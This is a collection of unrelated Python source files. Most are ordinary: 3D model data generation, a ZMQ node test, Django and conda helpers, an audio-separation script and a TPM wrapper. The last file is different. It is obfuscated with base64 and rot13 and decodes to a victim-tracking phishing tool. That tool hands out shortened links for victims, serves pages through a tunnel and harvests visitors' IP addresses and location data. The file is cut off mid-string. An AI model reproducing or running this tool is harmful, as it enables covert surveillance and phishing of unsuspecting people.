__init__(self, contents: str, next_page: str) -> None: self.next = next_page self.contents = contents def __str__(self) -> str: return 'Page(contents={}, next={})'.format(repr(self.contents), repr(self.next))
py
7dfd14c83bfbec09c4268e7248fc1b9618edc673
# sample of spectrum meter import sys import json def quote(s): return '"' + s + '"' def print_header(config): print('Header,2.1,0,0') return def print_model_info(config): print('ModelInfo,"{0}","","",""'.format( config['METER_MODEL_NAME'])) return def print_vertexes(config): V_TEMPLATE='Vertex,0,-1,1,0,0,0,-1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"b01",1,"",0,"",0,"",0,0,0,0,0,0,0,0,0,0' VT = V_TEMPLATE.split(',') vno = 0 n_bands = len(config['BAND_DEFS'][config['BANDS']][0]) for band in range(n_bands): for index in range(4): VT[1] = str(vno) vno += 1 if index % 2 == 0: VT[2] = str(band * config['BAR_WIDTH']) else: VT[2] = str( (band + 1) * config['BAR_WIDTH'] - config['BAR_SPACE']) if index < 2: VT[28] = quote(config['METER_BONE_NAME']).format(band) VT[3] = '0' else: VT[28] = '"b{0}0"'.format(band) VT[3] = '0' print(','.join(VT)) return def print_materials(config): M_TEMPLATE = 'Material,"平面","",1,1,1,0.8,0,0,0,100,0.3,0.3,0.3,1,0,0,0,0,0,0,1,0,0,0,1,"","",1,"",""' F_TEMPLATE = 'Face,"平面",0,0,1,2' MT = M_TEMPLATE.split(',') n_bands = len(config['BAND_DEFS'][config['BANDS']][0]) for band in range(n_bands): MT[1] = '"band{0}"'.format(band) MT[3] = MT[11] = str(config['BAR_RGB'][0]) #diffuse, env MT[4] = MT[12] = str(config['BAR_RGB'][1]) MT[5] = MT[13] = str(config['BAR_RGB'][2]) MT[7] = '0' #specular MT[8] = '0' MT[9] = '0' MT[6] = str(config['BAR_TRANSPARENCY']) print(','.join(MT)) for band in range(n_bands): vbase = band * 4 for i in range(2): if i == 0: ftext = 'Face,"band{0}",{1},{2},{3},{4}'.format( band, i, vbase, vbase + 1, vbase + 2, vbase + 3) else: ftext = 'Face,"band{0}",{1},{2},{3},{4}'.format( band, i, vbase + 1, vbase + 3, vbase + 2) print(ftext) def print_bones(config): B_TEMPLATE = 'Bone,"b00","",0,0,0,0,0,1,0,0,1,1,"",0,"",0,0,0,0,0,0,1,"",0,0,0,0,0,1,0,0,0,0,1,0,0,"",0,57.29578' BT = B_TEMPLATE.split(',') BT[1] = '"センター"' BT[9] = '1' print(','.join(BT)) BT[1] = '"bands_root"' BT[9] = '1' BT[13] = '"センター"' print(','.join(BT)) n_bands = len(config['BAND_DEFS'][config['BANDS']][0]) for band in range(n_bands): BT[5] = str(config['BAR_WIDTH'] * band + config['BAR_WIDTH'] / 2) BT[1] = '"b{0}0"'.format(band) BT[13] = '"bands_root"' BT[9] = '0' print(','.join(BT)) BT[13] = BT[1] BT[1] = quote(config['METER_BONE_NAME']).format(band) BT[9] = '1' print(','.join(BT)) def print_morph(config): M_TEMPLATE = 'Morph,"モーフ1","",4,2' MT = M_TEMPLATE.split(',') BM_TEMPLATE = 'BoneMorph,"モーフ1","b01",0,10,0,0,0,0' BMT = BM_TEMPLATE.split(',') n_bands = len(config['BAND_DEFS'][config['BANDS']][0]) for band in range(n_bands): morph_name = quote(config['METER_MORPH_NAME']).format(band) MT[1] = morph_name print(','.join(MT)) BMT[1] = morph_name BMT[2] = quote(config['METER_BONE_NAME']).format(band) BMT[4] = str(config['BAR_HEIGHT']) print(','.join(BMT)) MM_TEMPLATE = 'MaterialMorph,"0","band0",1,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0' MMT = MM_TEMPLATE.split(',') for band in range(n_bands): morph_name = quote(config['VIEW_MORPH_NAME']).format(band) MT[1] = morph_name MT[4] = '8' print(','.join(MT)) MMT[1] = morph_name MMT[2] = '"band{0}"'.format(band) print(','.join(MMT)) def print_nodes(config): print('Node,"Root","Root"') print('NodeItem,"Root",0,"センター"') print('Node,"表情","Exp"') n_bands = len(config['BAND_DEFS'][config['BANDS']][0]) for band in range(n_bands): print( ('NodeItem, "表情", 1, ' + quote(config['METER_MORPH_NAME'])) .format(band)) for band in range(n_bands): print( ('NodeItem, "表情", 1, ' + quote(config['VIEW_MORPH_NAME'])) .format(band)) print('Node,"bands",""') print('NodeItem,"bands",0,"bands_root"') for band in range(n_bands): print( ('NodeItem, "bands", 0, ' + quote(config['METER_BONE_NAME'])) .format(band)) if __name__ == '__main__': functions = [print_header, print_model_info, print_vertexes, print_materials, print_bones, print_morph, print_nodes] fp = open(sys.argv[1], 'r', encoding='utf-8') config = json.load(fp) fp.close() for f in functions: f(config)
py
7dfd150e3112ac6a30079397d6a028afac417d6f
#!/usr/bin/env python2 # Copyright (c) 2015 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Test ZMQ interface # from test_framework.test_framework import RavenDarkTestFramework from test_framework.util import * import zmq import binascii try: import http.client as httplib except ImportError: import httplib try: import urllib.parse as urlparse except ImportError: import urlparse class ZMQTest (RavenDarkTestFramework): port = 28332 def setup_nodes(self): self.zmqContext = zmq.Context() self.zmqSubSocket = self.zmqContext.socket(zmq.SUB) self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashblock") self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashtx") self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % self.port) return start_nodes(4, self.options.tmpdir, extra_args=[ ['-zmqpubhashtx=tcp://127.0.0.1:'+str(self.port), '-zmqpubhashblock=tcp://127.0.0.1:'+str(self.port)], [], [], [] ]) def run_test(self): self.sync_all() genhashes = self.nodes[0].generate(1) self.sync_all() print "listen..." msg = self.zmqSubSocket.recv_multipart() topic = msg[0] body = msg[1] msg = self.zmqSubSocket.recv_multipart() topic = msg[0] body = msg[1] blkhash = bytes_to_hex_str(body) assert_equal(genhashes[0], blkhash) #blockhash from generate must be equal to the hash received over zmq n = 10 genhashes = self.nodes[1].generate(n) self.sync_all() zmqHashes = [] for x in range(0,n*2): msg = self.zmqSubSocket.recv_multipart() topic = msg[0] body = msg[1] if topic == b"hashblock": zmqHashes.append(bytes_to_hex_str(body)) for x in range(0,n): assert_equal(genhashes[x], zmqHashes[x]) #blockhash from generate must be equal to the hash received over zmq #test tx from a second node hashRPC = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0) self.sync_all() # now we should receive a zmq msg because the tx was broadcast msg = self.zmqSubSocket.recv_multipart() topic = msg[0] body = msg[1] hashZMQ = "" if topic == b"hashtx": hashZMQ = bytes_to_hex_str(body) assert_equal(hashRPC, hashZMQ) #blockhash from generate must be equal to the hash received over zmq if __name__ == '__main__': ZMQTest ().main ()
py
7dfd16678fdc199cd2fb6114e3272757c5014aa7
from django.db import models from django.conf import settings import os def get_profileimg_path(instance, filename): return os.path.join('profile_image', str(instance.accuser.pk), filename) class Profile(models.Model): accuser = models.OneToOneField(settings.AUTH_USER_MODEL,on_delete=models.CASCADE,) nickname = models.CharField(max_length = 50) bio = models.TextField(max_length = 100) profileimg = models.ImageField(blank=True, upload_to=get_profileimg_path)
py
7dfd16d8c011e036778d81ac1f40a0ab904cd6b4
""" Functions related to core conda functionality that relates to manually installed Python packages, e.g. using "python setup.py install", or "pip". """ from __future__ import absolute_import, division, print_function, unicode_literals from io import open import os from os.path import isdir, isfile, join import re import sys from .common.compat import itervalues, on_win from .core.linked_data import linked_data from .misc import rel_path from .models.dist import Dist def get_site_packages_dir(installed_pkgs): for info in itervalues(installed_pkgs): if info['name'] == 'python': if on_win: stdlib_dir = 'Lib' else: py_ver = info['version'][:3] stdlib_dir = 'lib/python%s' % py_ver return join(stdlib_dir, 'site-packages') return None def get_egg_info_files(sp_dir): for fn in os.listdir(sp_dir): if not fn.endswith(('.egg', '.egg-info', '.dist-info')): continue path = join(sp_dir, fn) if isfile(path): yield path elif isdir(path): for path2 in [join(path, 'PKG-INFO'), join(path, 'EGG-INFO', 'PKG-INFO'), join(path, 'METADATA')]: if isfile(path2): yield path2 pat = re.compile(r'(\w+):\s*(\S+)', re.I) def parse_egg_info(path): """ Parse an .egg-info file and return its canonical distribution name """ info = {} for line in open(path, encoding='utf-8'): line = line.strip() m = pat.match(line) if m: key = m.group(1).lower() info[key] = m.group(2) try: return '%(name)s-%(version)s-<pip>' % info except KeyError: pass return None def get_egg_info(prefix, all_pkgs=False): """ Return a set of canonical names of all Python packages (in `prefix`), by inspecting the .egg-info files inside site-packages. By default, only untracked (not conda installed) .egg-info files are considered. Setting `all_pkgs` to True changes this. """ installed_pkgs = linked_data(prefix) sp_dir = get_site_packages_dir(installed_pkgs) if sp_dir is None: return set() conda_files = set() for info in itervalues(installed_pkgs): conda_files.update(info.get('files', [])) res = set() for path in get_egg_info_files(join(prefix, sp_dir)): f = rel_path(prefix, path) if all_pkgs or f not in conda_files: try: dist = parse_egg_info(path) except UnicodeDecodeError: dist = None if dist: res.add(Dist(dist)) return res if __name__ == '__main__': from pprint import pprint pprint(get_egg_info(sys.prefix))
py
7dfd174974e5687d75d8594524d8420924e95c03
Numero = int(input(':Que termo deseja encontrar: ')) ultimo = 1 penultimo = 1 if (Numero == 1) or (Numero == 2): print('1') else: for count in range(2,Numero): termo = ultimo + penultimo penultimo = ultimo ultimo = termo count += 1 print(termo)
py
7dfd1816e134bb323053d9b7710aa8d4242c6728
# encoding: utf-8 # # # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http:# mozilla.org/MPL/2.0/. # # Author: Kyle Lahnakoski ([email protected]) # from __future__ import absolute_import, division import re from mo_future import first from mo_dots import Data, coalesce, is_data, listwrap, wrap_leaves from mo_logs import Log, strings from mo_times.dates import Date GLOBALS = { "true": True, "false": False, "null": None, "EMPTY_DICT": {}, "coalesce": coalesce, "listwrap": listwrap, "Date": Date, "Log": Log, "Data": Data, "re": re, "wrap_leaves": wrap_leaves, "is_data": is_data, "first": first } def compile_expression(source, function_name="output"): """ THIS FUNCTION IS ON ITS OWN FOR MINIMAL GLOBAL NAMESPACE :param source: PYTHON SOURCE CODE :param function_name: OPTIONAL NAME TO GIVE TO OUTPUT FUNCTION :return: PYTHON FUNCTION """ fake_locals = {} try: exec( ( "def " + function_name + "(row, rownum=None, rows=None):\n" + " _source = " + strings.quote(source) + "\n" + " try:\n" + " return " + source + "\n" + " except Exception as e:\n" + " Log.error(u'Problem with dynamic function {{func|quote}}', func=_source, cause=e)\n" ), GLOBALS, fake_locals, ) except Exception as e: Log.error(u"Bad source: {{source}}", source=source, cause=e) return fake_locals["output"]
py
7dfd18fd052a7940e41576e52c4b043ba022b4fb
from django.conf import settings from mapentity.registry import registry from . import models app_name = 'maintenance' urlpatterns = registry.register(models.Intervention, menu=settings.INTERVENTION_MODEL_ENABLED) urlpatterns += registry.register(models.Project, menu=settings.PROJECT_MODEL_ENABLED)
py
7dfd1900f3eba800e28a87a5aa6a931b20f24d69
# Copyright 2021 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ''' MSS Inference code using D3Net. ''' import os import argparse import yaml import numpy as np import nnabla as nn from nnabla.ext_utils import get_extension_context from util import model_separate, save_stft_wav, generate_data from filter import apply_mwf from args import get_inference_args def run_separation(args, fft_size=4096, hop_size=1024, n_channels=2, apply_mwf_flag=True, ch_flip_average=False): # Set NNabla extention ctx = get_extension_context(args.context) nn.set_default_context(ctx) for i, input_file in enumerate(args.inputs): sample_rate, inp_stft = generate_data( input_file, fft_size, hop_size, n_channels) print(f"{i+1} / {len(args.inputs)} : {input_file}") out_stfts = {} inp_stft_contiguous = np.abs(np.ascontiguousarray(inp_stft)) for target in args.targets: # Load the model weights for corresponding target nn.load_parameters(f"{os.path.join(args.model_dir, target)}.h5") with open(f"./configs/{target}.yaml") as file: # Load target specific Hyper parameters hparams = yaml.load(file, Loader=yaml.FullLoader) with nn.parameter_scope(target): out_sep = model_separate( inp_stft_contiguous, hparams, ch_flip_average=ch_flip_average) out_stfts[target] = out_sep * np.exp(1j * np.angle(inp_stft)) if apply_mwf_flag: out_stfts = apply_mwf(out_stfts, inp_stft) sub_dir_name = '' output_subdir = args.out_dir + sub_dir_name output_subdir = os.path.join( output_subdir, os.path.splitext(os.path.basename(input_file))[0]) if not os.path.exists(output_subdir): os.makedirs(output_subdir) out = {} for target in args.targets: out[target] = save_stft_wav(out_stfts[target], hop_size, sample_rate, output_subdir + '/' + target + '.wav', samplewidth=2) if __name__ == '__main__': run_separation( get_inference_args(), fft_size=4096, hop_size=1024, n_channels=2, apply_mwf_flag=True, ch_flip_average=True )
py
7dfd192b5715119b37e0b031a333726a135786a7
""" SPDX-License-Identifier: BSD-2 """ from ._libtpm2_pytss import ffi from .utils import _chkrc class TCTI: def __init__(self, ctx): self._v1 = ffi.cast("TSS2_TCTI_CONTEXT_COMMON_V1 *", ctx) if self._v1.version == 2: self._v2 = ffi.cast("TSS2_TCTI_CONTEXT_COMMON_V2 *", ctx) else: self._v2 = None self._ctx = ctx @property def _tcti_context(self): return self._ctx @property def magic(self): return self._v1.magic @property def version(self): return self._v1.version def transmit(self, command): cmd = ffi.new("uint8_t []", command) clen = len(command) _chkrc(self._v1.transmit(self._ctx, clen, cmd)) def receive(self, size=-1, timeout=-1): if size == -1: size = 4096 resp = ffi.new("uint8_t []", b"\x00" * size) rsize = ffi.new("size_t *", size) _chkrc(self._v1.receive(self._ctx, rsize, resp, timeout)) return bytes(ffi.buffer(resp, rsize[0])) def finalize(self): self._v1.finalize(self._ctx) def cancel(self): _chkrc(self._v1.cancel(self._ctx)) def get_poll_handles(self): nhandles = ffi.new("size_t *", 0) _chkrc(self._v1.getPollHandles(self._ctx, ffi.NULL, nhandles)) if nhandles[0] == 0: return () handles = ffi.new("TSS2_TCTI_POLL_HANDLE []", nhandles[0]) _chkrc(self._v1.getPollHandles(self._ctx, handles, nhandles)) rh = [] for i in range(0, nhandles[0]): rh.append(handles[i]) return tuple(rh) def set_locality(self, locality): _chkrc(self._v1.setLocality(self._ctx, locality)) def make_sticky(self, handle, sticky): if self._v2 is None: raise RuntimeError("unsupported by TCTI API version") hptr = ffi.new("TPM2_HANDLE *", handle) _chkrc(self._v2.makeSticky(self._ctx, hptr, sticky)) return hptr[0]
py
7dfd197e98a1e6a4cb52d4b71f6213fa09463c62
bind = '0.0.0.0:8084' workers = 4 worker_class = 'gevent' worker_connections = 1000 max_requests = int(workers * worker_connections) keepalive = 2 max_requests_jitter = 5 timeout = 30 errorlog = '-'
py
7dfd19854be804f883ea2e92ecf5bab0dc42d24e
import base64, codecs magic = 'CgppbXBvcnQgcmFuZG9tCmltcG9ydCBvcywgc3lzCmltcG9ydCByYW5kb20KZnJvbSB0aW1lIGltcG9ydCBzbGVlcAppbXBvcnQganNvbgppbXBvcnQgYXJncGFyc2UKaW1wb3J0IHJlcXVlc3RzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHN1YnAKaW1wb3J0IGNzdgppbXBvcnQgdGltZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgoKI2NvbG91cnMgLS0tLS0tLS0tLS0tY29kZSdzLS0tIApyID0gIlwwMzNbMTszMW0iCmcgPSAiXDAzM1sxOzMybSIKeSA9ICJcMDMzWzE7MzNtIgpiID0gIlwwMzNbMTszNG0iCmQgPSAiXDAzM1syOzM3bSIKUiA9ICJcMDMzWzE7NDFtIgpZID0gIlwwMzNbMTs0M20iCkIgPSAiXDAzM1sxOzQ0bSIKdyA9ICJcMDMzWzE7MzdtIgpSID0gJ1wwMzNbMzFtJyAjIHJlZApHID0gJ1wwMzNbMzJtJyAjIGdyZWVuCkMgPSAnXDAzM1szNm0nICMgY3lhbgpXID0gJ1wwMzNbMG0nICAjIHdoaXRlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCnBhcnNlciA9IGFyZ3BhcnNlLkFyZ3VtZW50UGFyc2VyKCkKcGFyc2VyLmFkZF9hcmd1bWVudCgnLXMnLCAnLS1zdWJkb21haW4nLCBoZWxwPSdQcm92aWRlIFN1YmRvbWFpbiBmb3IgU2VydmVvIFVSTCAoIE9wdGlvbmFsICknKQpwYXJzZXIuYWRkX2FyZ3VtZW50KCctaycsICctLWttbCcsIGhlbHA9J1Byb3ZpZGUgS01MIEZpbGVuYW1lICggT3B0aW9uYWwgKScpCnBhcnNlci5hZGRfYXJndW1lbnQoJy10JywgJy0tdHVubmVsJywgaGVscD0nU3BlY2lmeSBUdW5uZWwgTW9kZSBbIEF2YWlsYWJsZSA6IG1hbnVhbCBdJykKcGFyc2VyLmFkZF9hcmd1bWVudCgnLXAnLCAnLS1wb3J0JywgdHlwZT1pbnQsIGRlZmF1bHQ9ODA4MCwgaGVscD0nUG9ydCBmb3IgV2ViIFNlcnZlciBbIERlZmF1bHQgOiA4MDgwIF0nKQoKYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKc3ViZG9tID0gYXJncy5zdWJkb21haW4Ka21sX2ZuYW1lID0gYXJncy5rbWwKdHVubmVsX21vZGUgPSBhcmdzLnR1bm5lbApwb3J0ID0gYXJncy5wb3J0Cgpyb3cgPSBbXQppbmZvID0gJycKcmVzdWx0ID0gJycKCiNzY3JpcHQgYmFubmVyLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCgojQUxMIGNvbW1lbnQgYXJlIHVuZGVyIHRlc3RlZCBzbyBpZ25vcmUgaGltIHdoZW4gaSB1cGRhdGUgaXQgdGhlbiBpdHMgaGVscCBtZSBvdXQgdG8gdGhpbmsgYmV0dGVyIHNvIHRoYW5rcyBmb3IgdXNpbmcgdG9vbAojd2Ugd2lsbCB1cGRhdGUgc29vbgojd2Ugd2lsbCBhZGQgc3Bvb2ZpbmcgeCBib21iaW5nIAojc29vbgojYnkgdmFpbXBpZXIgcml0aWsKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCmRlZiBiYW5uZXIoKToKICAgIHByaW50KHcrZCsiICAgICAgLCwgICAgICAgICAgICAgICAgLCwiKQogICAgcHJpbnQodytkKyIgICAgKCgoKCggICAgICAgICAgICAgICkpKSkpIikKICAgIHByaW50KHcrZCsiICAgKCgoKCgoICAgICAgICAgICAgICApKSkpKSkiKQogICAgcHJpbnQodytkKyIgICAoKCgoKCggICAgICAgICAgICAgICkpKSkpKSIpCiAgICBwcmludCh3K2QrIiAgICAoKCgoKCIrdytiKyIsckBAQEBAQEBAQEBlLCIrdytkKyIpKSkpKSIpCiAgICBwcmludCh3K2QrIiAgICAgICgoKCIrdytiKyJAQEBAQEBAQEBAQEBAQEBAIit3K2QrIikpKSAgICAiK3crYisiVmFpbVNhbWF5IC0gdmVyc2lvbiAxLjAiKQogICAgcHJpbnQodytiKyIgICAgICBcQEAvIityKyIsOjo6LCIrdytiKyJcLyIrcisiLDo6OiwiK3crYisiXEBAICAgICAgICIrdysiLS0tLS0tLS0tLS0tLS0tLS0tIikKICAgIHByaW50KHcrYisiICAgICAvQEBAfCIrcisiOjo6OjoiK3crYisifHwiK3IrIjo6Ojo6Iit3K2IrInxAQEBcXCAgICAgIityKyJJbnN0YWdyYW0iK3crIiA6ICIreSsiQHZhaW1waWVyX3JpdGlrIHggQF92aWxlbl9iaG9pIikKICAgIHByaW50KHcrYisiICAgIC8gQEBAXFwiK3IrIic6OjonIit3K2IrIi9cXCIrcisiJzo6OiciK3crYisiL0BAQCBcXCAgICAiK3cpCiAgICBwcmludCh3K2IrIiAgIC8gIC9AQEBAQEBALy9cXFxAQEBAQEBAXCAgXFwgICAiK2crIlRoZSBhdXRob3IgaXMgbm90IHJlc3BvbnNpYmxlIikKICAgIHByaW50KHcrYisiICAoICAvICAnQEBAQEA9PT09QEBAQEAnICBcICApICAiK2crImZvciBhbnkgaXNzdWVzIG9yIGRhbWFnZSIpCiAgICBwcmludCh3K2IrIiAgIFwoICAgICAvICAgICAgICAgIFwgICAgICkvICAgIitnKyJjYXVzZWQgYnkgdGhpcyBwcm9ncmFtIikKICAgIHByaW50KHcrYisiICAgICBcICAgKCAgICAgICAgICAgICkgICAvIikKICAgIHByaW50KHcrYisiICAgICAgICAgIFwgICAgICAgICAgLyIrdykKCSAgICAKCgpkZWYgcmFuZG9tbGluaygpOgoJIiIiCglmb3IgbGV0dGVyIGluIHN0cmluZzoKCSAgc2xlZXAoMC4wMSkgCgkgIHN5cy5zdGRvdXQud3JpdGUobGV0dGVyKQoJICBzeXMuc3Rkb3V0LmZsdXNoKCkKCXByaW50KCJcbiIpCgkiIiIKCV92Yl8gPSBbCgoJJ2h0dHBzOi8vYml0Lmx5LzN6NzFCYlgnLAoJJ2h0dHBzOi8vY3V0dC5seS9KVzBSMWZPJywKCSdodHRwczovL3Nob3J0dXJsLmF0L2NobkNJJywKCSdodHRwczovL3JiLmd5L2cyOWM5cCcsCgknaHR0cHM6Ly90aW55dXJsLmNvbS9WYWltU2FtYXknLAoJJ2h0dHBzOi8vc2hyZWtpcy5saWZlL0o1ODQ1Vi5naWYnLAoJJ2h0dHBzOi8vcmVicmFuZC5seS9xZjRmZjkwJwoKCV0KCgoJcHJpbnQocisi4pSU4pSAIit3KyJbIV0gU2VuZCB0aGlzIExpbmsgdG8geW91ciB2aWNpdG0gOiAiK3krcmFuZG9tLmNob2ljZShfdmJfKSkKCWJhY2s9aW5wdXQocisiLi7ilJTilIAiK3crIlwwMzNbMTszN21CYWNrIFsgeSAvIG4gXTogIityKQoJaWYgYmFjaz09J3knIG9yIGJhY2s9PSdZJzoKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlpcCgpCglpZiBiYWNrPT0nbicgb3IgYmFjaz09J04nOgoJCXN5cy5leGl0KCkKCWVsc2U6CgkJYmFja2llKCkKCgoKCmRlZiBieWUoKToKCW9zLnN5c3RlbSgiY2xlYXIi' love = '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